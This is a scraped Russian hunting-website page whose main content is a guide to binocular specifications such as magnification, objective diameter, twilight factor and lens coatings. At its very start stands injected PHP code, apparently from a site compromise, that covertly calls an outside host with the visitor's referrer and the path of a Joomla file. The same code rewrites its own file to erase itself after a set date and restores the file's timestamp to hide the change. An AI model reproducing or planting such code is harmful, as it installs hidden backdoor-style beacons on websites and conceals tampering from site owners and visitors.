check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Охотнику о важнейших свойствах биноклей

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 7421 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Охотнику о важнейших свойствах биноклей

Чтобы Вам было легче правильно выбрать для себя бинокль, мы советуем Вам прочитать этот текст. Здесь кратко объясняется, что стоит за основными параметрами биноклей.
Человеческий глаз не приспособлен для наблюдения с больших дистанций. Бинокль позволяет подробно рассматривать весьма удаленные объекты. Во сколько раз увеличивается предмет при дневном освещении и во сколько раз становится светлее наблюдаемое поле, зависит от мощности бинокля. А этот параметр, в свою очередь, зависит от увеличения и диаметра объектива. 

Увеличение

Предположим, что на некотором бинокле после названия модели есть надпись 8 Х 30. Это означает, что увеличение равно 8 (8Х) и видимая в бинокль «картинка» будет казаться в восемь раз крупнее, чем при наблюдении ее невооруженным глазом. Кратность увеличения полевых биноклей обычно находится в пределах от 7 до 20. Необходимо помнить, что чем выше кратность увеличения, тем уже поле зрения и тем жестче должен фиксироваться бинокль при наблюдении. Естественное дрожание рук приводит к полному размыванию «картинки» в биноклях с высокой кратностью увеличения. В корпусах некоторых биноклей есть резьбовые отверстия для крепления на штативах. В современных биноклях применяются различные (механические и электронные) методы стабилизации изображения. (курсив - моя добавка Т.В.)

Диаметр линз объектива

Второе число после названия модели (в нашем примере 30) диаметр линз объектива, выраженный в мм. Чем больше это число, тем больше света попадает в бинокль. Для использования только в дневное время вполне достаточно бинокля с линзами объектива в 20 – 25 мм. В условиях недостаточной освещенности для получения более светлой и четкой картинки необходимы бинокли с объективами большего диаметра.

Диаметр выходного зрачка

Если разделить диаметр линз объектива на увеличение, то получится диаметр выходного зрачка, или реальный размер картинки, которую мы наблюдаем с помощью бинокля. Этот размер просто связан с диаметром зрачка человека и никоим образом не влияет на качество изображения. Так как зрачок человека даже в сумерках не превосходит 7 мм, нет смысла делать больше диаметр выходного зрачка.

Геометрическая светосила

Объективы оптических приборов издавна принято характеризовать отношением диаметра линз объектива к его фокусному расстоянию. Это отношение называют «относительным отверстием». А квадрат этой величины и есть геометрическая светосила. Прямого отношения к качеству изображения в сумерках этот параметр отношения не имеет. Это свойство определяется следующим параметром.

«Сумеречное число»

Сумеречное число показывает, насколько просветляется поле, наблюдаемое при недостаточной освещенности. Количественно оно равно квадратному корню из произведения увеличения на диаметр линз объектива. Для бинокля с параметрами 8 Х 30 сумеречное число равно 15,5. Чем больше это число, тем светлее и детальнее изображение в сумерках.

Поле зрения

«Поле зрения» указывает, сколько метров территории видно на расстоянии 1 000 м. Это значит: если, например, оптика неудовлетворительна, картина нечеткая на периферии или расплылась, то наблюдатель может использовать только середину изображения. Значит, реальная ширина поля зрения будет уменьшена. Для оценки качества бинокля, полезно рассматривать удаленные объекты, имеющие мелкие детали.

Бинокли для тех, кто носит очки

Чтобы люди, пользующиеся очками, могли полноценно использовать все возможности бинокля, выпускаются специальные бинокли, которые германские производители отмечают литерой "В" (от немецкого слова Brille - очки). В таких биноклях реализована специальная оптическая схема, и на объективах находятся специальные тубусы из мягкой резины. Это позволяет полноценно видеть поле как в очках, так и без них. Стабильность бинокулярной юстировки Так как бинокль состоит из двух «труб», очень важно, чтобы их оптические и механические оси были строго параллельны. При транспортировке и эксплуатации юстировка не должна сбиваться.

Герметичность.

Тряска, удары, пыль и влага могут серьезно ухудшить свойства бинокля. Специальные резиновые манжеты и сальники обеспечивают необходимую герметичность бинокля. Это особенно актуально, так как внутренний объем биноклей заполняется сухим воздухом или инертным газом. Это необходимо, чтобы при понижении температуры на внутренних поверхностях оптических элементов не конденсировалась вода.

Просветление.

Этим нашим не вполне корректным термином у нас принято назвать наличие на линзах биноклей антибликового покрытия. Поверхности линз отражают некоторую часть падающего света обратно в поле. Чтобы снизить этот эффект и убрать блики отраженного света применяются специальные покрытия. Для получения максимального эффекта необходимо покрывать все стеклянные поверхности, имеющие контакт с воздухом и газовой фазой внутри бинокля. Наличие просветления улучшает качество изображения (контраст и яркость). Понятно, что на обеих трубах должно быть совершенно одинаковое покрытие. Для улучшения стойкости этих покрытий их наносят путем многократного напыления. На рисунках показаны два объектива с разными типами напыления.

 

Охотнику о важнейших свойствах биноклей
AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить